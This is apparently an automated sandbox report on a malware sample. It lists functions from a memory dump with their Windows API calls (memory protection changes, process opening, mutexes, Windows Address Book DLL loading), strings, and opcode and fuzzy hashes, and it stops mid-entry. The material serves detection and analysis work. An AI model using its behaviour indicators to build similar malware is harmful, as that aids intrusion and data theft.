Part of subcall function 00B20DCC: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00B123FE), ref: 00B20DFA

lstrlenW.KERNEL32(00000000,00000000,73B006E0,00000020,00750025,80000001), ref: 00B1D5B6
lstrlenW.KERNEL32(00000008), ref: 00B1D5BD
lstrlenW.KERNEL32(?,?), ref: 00B1D5D9
lstrlen.KERNEL32(?,006F0070,00000000), ref: 00B1D653
lstrlenW.KERNEL32(?), ref: 00B1D65F
wsprintfA.USER32 ref: 00B1D68D

Part of subcall function 00B24FB0: RtlFreeHeap.NTDLL(00000000,00000200,00B26EB2,00000000,00000100,00000200), ref: 00B24FBC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
String ID:
API String ID: 3384896299-0
Opcode ID: 0dffca2d2f94ff063085708ebbda636dc7d32142593878cfb59ce075378bab72
Instruction ID: 0900a21791c15d1eacf59e88c963e05c0ae8c3eb59d475834a509523647b490e
Opcode Fuzzy Hash: 0dffca2d2f94ff063085708ebbda636dc7d32142593878cfb59ce075378bab72
Instruction Fuzzy Hash: F6414F71900219AFCB01EFA8DC85DEE7BF8EF48304B1144A6F928D7262DB75DA549F60

Uniqueness

Uniqueness Score: -1.00%

Function 00B34670, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17D07: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B18663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00B21117), ref: 00B17D13
Part of subcall function 00B17D07: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B18663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 00B17D71
Part of subcall function 00B17D07: lstrcpy.KERNEL32(00000000,00000000), ref: 00B17D81

lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 00B346BF
wsprintfA.USER32 ref: 00B346EF
GetLastError.KERNEL32 ref: 00B34764

Strings

Content-Type: application/octet-stream, xrefs: 00B346E3
`, xrefs: 00B34720

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
String ID: Content-Type: application/octet-stream$`
API String ID: 324226357-1382853987
Opcode ID: 4a608b8678402c7481f36987fea351fcd2af843be42e084d2badfa90e39104ba
Instruction ID: 0402af151590e2cffb05d91b9258b1bb506a32aed2d5f371063018deaa3d4fc9
Opcode Fuzzy Hash: 4a608b8678402c7481f36987fea351fcd2af843be42e084d2badfa90e39104ba
Instruction Fuzzy Hash: BD31BF7150020AAFCB129F55EC86EAB7BE8EF55350F2040A9F91997261EB70FD588B50

Uniqueness

Uniqueness Score: -1.00%

Function 00B239D7, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2B01E: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 00B2B02A
Part of subcall function 00B2B01E: SetLastError.KERNEL32(000000B7,?,00B239EB,?,?,00000000,?,?,?), ref: 00B2B03B

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 00B23A0B
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 00B23AE3

Part of subcall function 00B13828: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B13842
Part of subcall function 00B13828: CreateWaitableTimerA.KERNEL32(00B3E0D4,00000003,?), ref: 00B1385F
Part of subcall function 00B13828: GetLastError.KERNEL32(?,?,00B23A3F,?,?,?,00000000,?,?,?), ref: 00B13870
Part of subcall function 00B13828: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00B23A3F,?,?,?,00B23A3F,?), ref: 00B138B0
Part of subcall function 00B13828: SetWaitableTimer.KERNEL32(00000000,00B23A3F,00000000,00000000,00000000,00000000,?,?,00B23A3F,?), ref: 00B138CF
Part of subcall function 00B13828: HeapFree.KERNEL32(00000000,00B23A3F,00000000,00B23A3F,?,?,?,00B23A3F,?), ref: 00B138E5

GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 00B23ACC
ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 00B23AD5

Part of subcall function 00B2B01E: CreateMutexA.KERNEL32(00B3E0D4,00000000,?,?,00B239EB,?,?,00000000,?,?,?), ref: 00B2B04E

GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 00B23AF0

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: 8dafbb809506cd5b595693b7e8208db9af0f5bd815da640446bf090e59d523e7
Instruction ID: 1ef621da1761b5588819e30b4f8c204e6b0f309115d8238149f2fc9a6bc8e798
Opcode Fuzzy Hash: 8dafbb809506cd5b595693b7e8208db9af0f5bd815da640446bf090e59d523e7
Instruction Fuzzy Hash: D131A371A00205AFCB11AF74EC858AE7BFAEB85700B240566F81AD7271DE75C941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B3220F, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 00B32228

Part of subcall function 00B13CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00B2F65A), ref: 00B13CCA

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00B23EF5,00000000), ref: 00B3226A
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 00B322BC
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,00B23EF5,00000000), ref: 00B322D5

Part of subcall function 00B345FE: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B3461F
Part of subcall function 00B345FE: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,00B3225B,00000000,00000000,00000000,00000001,?,00000000), ref: 00B34662

GetLastError.KERNEL32(?,00000000,00B23EF5,00000000), ref: 00B3230D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: 8449976642e50a52023105b4b8905b4edb4466ef76b3188427bdf2569649e0a4
Instruction ID: 1fc0d7b814534ac675a2b9562c64d43dfdf81300300a067e5ae395dd6bcfc4a4
Opcode Fuzzy Hash: 8449976642e50a52023105b4b8905b4edb4466ef76b3188427bdf2569649e0a4
Instruction Fuzzy Hash: 80311E75A04218EFDF15DFA4ED80AAE7BF5EF08750F200095E905AB261DB74AE40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B28291, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1C71D: lstrlen.KERNEL32(00000000,00000000,?,73B75520,00B282A5,00000000,00000000,00000000,73B75520,?,00000022,00000000,00000000,00000000,?,?), ref: 00B1C729

RtlEnterCriticalSection.NTDLL(00B3E268), ref: 00B282BB
RtlLeaveCriticalSection.NTDLL(00B3E268), ref: 00B282CE
GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B282DF
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00B2834A
InterlockedIncrement.KERNEL32(00B3E27C), ref: 00B28361

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: 39a3de8c280e2f8e2cf474b20913d299660e0ffc8245e96d93cc2047a1dea35b
Instruction ID: d24c493a3d1fc7555803f5cce0cd86f6705821acaf7a579efe311a07f175ecb8
Opcode Fuzzy Hash: 39a3de8c280e2f8e2cf474b20913d299660e0ffc8245e96d93cc2047a1dea35b
Instruction Fuzzy Hash: 52318D325057159FC725CF68E844A2AB7E8FB44721F244A6AF869832A0CF30EC15CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00B17365, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,73B75520,?,?,00B21386,00000000,?,?), ref: 00B17383
GetFileSize.KERNEL32(00000000,00000000,?,?,00B21386,00000000,?,?,?,?,00000000,00B11589,?,00000000,?,00B25B4A), ref: 00B17393
ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,00B21386,00000000,?,?,?,?,00000000,00B11589), ref: 00B173BF
GetLastError.KERNEL32(?,?,00B21386,00000000,?,?,?,?,00000000,00B11589,?,00000000,?,00B25B4A,?,00000001), ref: 00B173E4
CloseHandle.KERNEL32(000000FF,?,?,00B21386,00000000,?,?,?,?,00000000,00B11589,?,00000000,?,00B25B4A,?), ref: 00B173F5

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: 75d5018205c2d1de01d47c7be928d216010da5d29b3deeaf55869feb504aea60
Instruction ID: 7eb2b6006b485b573895edb75a5bd0af80bb1be30345876d27d0d55b990df19a
Opcode Fuzzy Hash: 75d5018205c2d1de01d47c7be928d216010da5d29b3deeaf55869feb504aea60
Instruction Fuzzy Hash: 9911E472144215EFDB211F68ECC4EEE7AFDEB443A0F5141A6FD25A7150DE708D8196A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B317F1, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,64F16420,64F16420,?,00B1B0C6,?,?,?,00000000,?,?,00000001), ref: 00B31802
StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,64F16420,64F16420,?,00B1B0C6,?,?,?,00000000,?,?,00000001), ref: 00B3181B
StrTrimA.SHLWAPI(?,20000920,?,00000000,64F16420,64F16420,?,00B1B0C6,?,?,?,00000000,?,?,00000001,00000000), ref: 00B31843
StrTrimA.SHLWAPI(00000000,20000920,?,00000000,64F16420,64F16420,?,00B1B0C6,?,?,?,00000000,?,?,00000001,00000000), ref: 00B31852
HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,64F16420,64F16420,?,00B1B0C6,?,?,?), ref: 00B31889

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: 4eb1634527d26141b81665a6946445ceada06e96073c28520745620287acb3e2
Instruction ID: 79c7a5bbab89cf806a62deec027766a3118024e4cc3b353bdc949c01049c97dc
Opcode Fuzzy Hash: 4eb1634527d26141b81665a6946445ceada06e96073c28520745620287acb3e2
Instruction Fuzzy Hash: 74116072200205BBDB219B9DDC85FAB7BEDEB44790F240461BA099B191DFB0ED41C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00B2FD52, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,?,00000000,?,?,00000000,00000000,?,00B1A4D6,00000000,00B1585F,00000000,00B3DEAC,00000008), ref: 00B2FD89
VirtualProtect.KERNEL32(00000000,00000004,?,?,?,00B1A4D6,00000000,00B1585F,00000000,00B3DEAC,00000008,00000003), ref: 00B2FDB9
RtlEnterCriticalSection.NTDLL(00B3E240), ref: 00B2FDC8
RtlLeaveCriticalSection.NTDLL(00B3E240), ref: 00B2FDE6
GetLastError.KERNEL32(?,00B1A4D6,00000000,00B1585F,00000000,00B3DEAC,00000008,00000003), ref: 00B2FDF6

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 5632749359797d39a8a5048d2cd405cd794b43f75f2ea37cbdc23ea699822eb3
Instruction ID: 6287f7a62ae9f65e0628b6691d32c154757b1fe1ce3d2acbf599ab9445bfd6df
Opcode Fuzzy Hash: 5632749359797d39a8a5048d2cd405cd794b43f75f2ea37cbdc23ea699822eb3
Instruction Fuzzy Hash: 662109B5600B02AFD711DFA8D98095AB7F8FB08310B10456AEA5997760DB70F904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B234B4, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 00B234E2
GetLastError.KERNEL32 ref: 00B23505
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B23518
GetLastError.KERNEL32 ref: 00B23523
HeapFree.KERNEL32(00000000,00000000), ref: 00B2356B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: eb78df1ce5271eb5f6ea0b96c3f1699d280bac815c3dbfab7e41f10cb7b79d98
Instruction ID: 3f192d6467d0960946cfde299b0e0db800f0b7fb625fea4738cde1dbf18c25f4
Opcode Fuzzy Hash: eb78df1ce5271eb5f6ea0b96c3f1699d280bac815c3dbfab7e41f10cb7b79d98
Instruction Fuzzy Hash: BC217770510244EBEB218B64ECC8B5E7BF9FB10B14F3004A8F15E965A0CB79EE88CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B1DD8D, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00B26602,?,?,?,?,00000008,00B26602,00000000,?), ref: 00B1DDAA
memcpy.NTDLL(00B26602,?,00000009,?,?,?,?,00000008,00B26602,00000000,?), ref: 00B1DDCC
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00B1DDE4
lstrlenW.KERNEL32(00000000,00000001,00B26602,?,?,?,?,?,?,?,00000008,00B26602,00000000,?), ref: 00B1DE04
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00B26602,00000000,?), ref: 00B1DE29

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: 7fafb89eb4faf0ed7355362a736e894656ee9ea558bcd4aa6556947b9352cc44
Instruction ID: 5b475766ba1176dd8c4ce039a3db15677255216e1e6dccd74160e1e0ee2334ee
Opcode Fuzzy Hash: 7fafb89eb4faf0ed7355362a736e894656ee9ea558bcd4aa6556947b9352cc44
Instruction Fuzzy Hash: EC11827AE00208BBCB159BA4EC49FDE7FB8EB18750F104065FA19E7291DA70D649DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B2ECB1, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00B36C86,73B75520,00B14BBD,?,?,?,00B115E5,?,?,00000000,?,00B25B4A,?,00000001), ref: 00B2ECBB

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

lstrcpy.KERNEL32(00000000,?), ref: 00B2ECDF
StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00B115E5,?,?,00000000,?,00B25B4A,?,00000001), ref: 00B2ECE6
lstrcpy.KERNEL32(00000000,4C003436), ref: 00B2ED2E
lstrcat.KERNEL32(00000000,00000001), ref: 00B2ED3D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: 1191775bbf31de497ee1cedc02fbeb4913d0f2dcad1a3265a196971036168908
Instruction ID: 6a30323b48f3867820daccc4284e4de1789eb13700ff6025767fe74e10ce709e
Opcode Fuzzy Hash: 1191775bbf31de497ee1cedc02fbeb4913d0f2dcad1a3265a196971036168908
Instruction Fuzzy Hash: 4A115E32204216ABD3208B6AFC88E6B7BECEF84780F290469F629C7150DB70D949C731

Uniqueness

Uniqueness Score: -1.00%

Function 00B1AA89, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1C71D: lstrlen.KERNEL32(00000000,00000000,?,73B75520,00B282A5,00000000,00000000,00000000,73B75520,?,00000022,00000000,00000000,00000000,?,?), ref: 00B1C729

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B1AAB2
memcpy.NTDLL(00000000,?,?), ref: 00B1AAC5
RtlEnterCriticalSection.NTDLL(00B3E268), ref: 00B1AAD6
RtlLeaveCriticalSection.NTDLL(00B3E268), ref: 00B1AAEB
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B1AB23

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: ea99e24d3ba38ead52ad45491389b6697676620a5cf37bc87321438fa9c528ff
Instruction ID: 1a9da6a6fc9f0aaa59b979c325ea553233af7579a2a90bcfcc60d6e3590bb477
Opcode Fuzzy Hash: ea99e24d3ba38ead52ad45491389b6697676620a5cf37bc87321438fa9c528ff
Instruction Fuzzy Hash: E011C276105310AFC3255F24AC84D6F7BADFB4632172105BBF82693260CF71AC45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B2FE0E, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00B2FE2E
GetModuleHandleA.KERNEL32 ref: 00B2FE3C
LoadLibraryExW.KERNEL32(?,?,?), ref: 00B2FE49
GetModuleHandleA.KERNEL32 ref: 00B2FE60
GetModuleHandleA.KERNEL32 ref: 00B2FE6C

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$LibraryLoad
String ID:
API String ID: 1178273743-0
Opcode ID: 4e38c7d9631d002daf71b2ca03802fb35cacbd6fbdc60d49868070613e896b7f
Instruction ID: 6cef3dd6ac208d1e6e1fcbf507979ec718ce985ba53160973b3b7012e7b21d02
Opcode Fuzzy Hash: 4e38c7d9631d002daf71b2ca03802fb35cacbd6fbdc60d49868070613e896b7f
Instruction Fuzzy Hash: 33011D3160432A9BDF026F69FC41A6A7FE9EB18360765017AF918C3171DFB1DC219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B22AC4, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00B3E240), ref: 00B22ACF
RtlLeaveCriticalSection.NTDLL(00B3E240), ref: 00B22AE0
VirtualProtect.KERNEL32(?,00000004,00000040,0000000C,?,?,00B20AA0,00B3D7A0,73B757B0,00000000,00B21E50,0000000C,00000000,?,0000000C,00000000), ref: 00B22AF7
VirtualProtect.KERNEL32(?,00000004,0000000C,0000000C,?,?,00B20AA0,00B3D7A0,73B757B0,00000000,00B21E50,0000000C,00000000,?,0000000C,00000000), ref: 00B22B11
GetLastError.KERNEL32(?,?,00B20AA0,00B3D7A0,73B757B0,00000000,00B21E50,0000000C,00000000,?,0000000C,00000000,WININET.dll), ref: 00B22B1E

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: d209851c7882cd297e72293aff9aacce1795fca33486884715b5549ec2b3ccca
Instruction ID: 538f57e1e6f58566abf2999c6bf2b2b6cb63de5021837a8c2971e0e17d22130e
Opcode Fuzzy Hash: d209851c7882cd297e72293aff9aacce1795fca33486884715b5549ec2b3ccca
Instruction Fuzzy Hash: 2A018B75200704AFD7219F25DC04E6AB7F9FF89320B208569FA5A937A0CB70ED068F20

Uniqueness

Uniqueness Score: -1.00%

Function 00B24E2B, Relevance: 7.5, APIs: 5, Instructions: 39synchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B251FB: InterlockedExchange.KERNEL32(00000002,000000FF), ref: 00B25202

GetCurrentThreadId.KERNEL32 ref: 00B24E43
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00B24E53
CloseHandle.KERNEL32(00000000), ref: 00B24E5C
VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,000000FF,000000FF,00B30B37), ref: 00B24E7A
VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,000000FF,000000FF,00B30B37), ref: 00B24E87

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual$CloseCurrentExchangeHandleInterlockedObjectSingleThreadWait
String ID:
API String ID: 2588964033-0
Opcode ID: 17781d28f08848595a2dcf03f3173cf491cadbb0e419e9d601d06cf757d58351
Instruction ID: 0fbf64152262e0153b97844c274fb6cd6aa8926f28de16d2bd28b96754b71932
Opcode Fuzzy Hash: 17781d28f08848595a2dcf03f3173cf491cadbb0e419e9d601d06cf757d58351
Instruction Fuzzy Hash: EBF04F71100B10ABE634AB75EC48F1BB3ECFF48711F110A59B689939A0DF34EC08CA21

Uniqueness

Uniqueness Score: -1.00%

Function 001F4CF4, Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001F2501,?), ref: 001F4CFC
GetVersion.KERNEL32 ref: 001F4D0B
GetCurrentProcessId.KERNEL32 ref: 001F4D1A
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001F4D37
GetLastError.KERNEL32 ref: 001F4D56

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: ed89bcc1cd1a28f951925dde5e65d7bda971bbe1108bf72b8407ea6da2b83ada
Instruction ID: a9333f6be1ffa85cd5fce271f5778e144075836c3e77fe13d560a255f2ca6975
Opcode Fuzzy Hash: ed89bcc1cd1a28f951925dde5e65d7bda971bbe1108bf72b8407ea6da2b83ada
Instruction Fuzzy Hash: 52F01D75680305EBD7109FB5BE09B3A3BA2A754B51F108515F22AC59F0DB708482EFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00B28B88, Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00B1A08D,?), ref: 00B28B90
GetVersion.KERNEL32 ref: 00B28B9F
GetCurrentProcessId.KERNEL32 ref: 00B28BAE
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00B28BCB
GetLastError.KERNEL32 ref: 00B28BEA

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: d80dfc719bc2885a378708662604a103ba9daaecd49ad14b35178452bcbdc92e
Instruction ID: cd5290c418860d317d16ac3b6d84997370d2482808e65bc55bcd1adde9e98994
Opcode Fuzzy Hash: d80dfc719bc2885a378708662604a103ba9daaecd49ad14b35178452bcbdc92e
Instruction Fuzzy Hash: C6F03AB0685305AFE3288F24AC8EB1D3BA5B714701F70491AF12AD71E0DFB1D446CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00B22692, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,?,?,?,?), ref: 00B22775
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,00B15E99), ref: 00B227E7
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B227F8

Part of subcall function 00B20158: RtlLeaveCriticalSection.NTDLL(?), ref: 00B201D5

Strings

HTTP/1.1 404 Not Found, xrefs: 00B2276D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalFreeLeaveSectionmemcpy
String ID: HTTP/1.1 404 Not Found
API String ID: 4231733408-2072751538
Opcode ID: f8353872c75a13593e2c2da5f52f0f7d0a2560896d6dde08a94b8f3c4bc17c29
Instruction ID: 8492ff521cef77cfea219dc4328b0a1da3b922e3cd3268352ca61e94be554d02
Opcode Fuzzy Hash: f8353872c75a13593e2c2da5f52f0f7d0a2560896d6dde08a94b8f3c4bc17c29
Instruction Fuzzy Hash: CA618335600616FFEB119F65EA81BA5B7E5FF08340F1044A9F90CDAA61EB71ED20DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00B1CD69, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74synchronizationCOMMON

Download Yara Rule

APIs

RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 00B1CD9D
RtlFreeAnsiString.NTDLL(?), ref: 00B1CE1D
WaitForSingleObject.KERNEL32(00000000), ref: 00B1CE2A

Strings

?@, xrefs: 00B1CE05

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: String$AnsiFreeObjectSingleUnicodeUpcaseWait
String ID: ?@
API String ID: 2603241602-3895805154
Opcode ID: d0baf5289d8a894ee652af569c9d8b0f1d376627c152877bbceb736a37e560a7
Instruction ID: 5b6372af6d74f4ea5aca763201f5c89ff5520d003df6e6058a0ade105b9dcb0f
Opcode Fuzzy Hash: d0baf5289d8a894ee652af569c9d8b0f1d376627c152877bbceb736a37e560a7
Instruction Fuzzy Hash: 9C21D177604704ABC714DF65DC898AEBBE9FB44310B9448AAF546C3560DB70ECE48BE2

Uniqueness

Uniqueness Score: -1.00%

Function 00B18247, Relevance: 6.3, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00B182D1
HeapFree.KERNEL32(00000000,?), ref: 00B182E2
HeapFree.KERNEL32(00000000,?), ref: 00B182FA
CloseHandle.KERNEL32(?), ref: 00B18314
HeapFree.KERNEL32(00000000,?), ref: 00B18329

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: a32c8463833d47fb6050f471c8a84463f6c60e5f9344e17858a38a1e47a3afa1
Instruction ID: 11a61b30377683704c47f88eba2f101ebe6b6ad692a78ffc3621002536d13f9c
Opcode Fuzzy Hash: a32c8463833d47fb6050f471c8a84463f6c60e5f9344e17858a38a1e47a3afa1
Instruction Fuzzy Hash: F631F530201921AFC7129F65ED8885EFBEAFF49B103A84594F409D7A65CB31ECA1CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1880D, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 00B2FC77: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 00B2FC92
Part of subcall function 00B2FC77: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 00B2FCE0
Part of subcall function 00B2FC77: GetProcAddress.KERNEL32(00000000,WABOpen), ref: 00B2FCF2
Part of subcall function 00B2FC77: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 00B2FD43

GetLastError.KERNEL32(?,?,00000001), ref: 00B1899B
FreeLibrary.KERNEL32(?,?,00000001), ref: 00B18A03

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: 242bbc9c6fc004e4989c3172a20734439c22878336abeae3d591165ccf78a371
Instruction ID: fb5db51a7e4338595d0a7db0487b90f69d28ca1aa9983f7a1cd39538413c651f
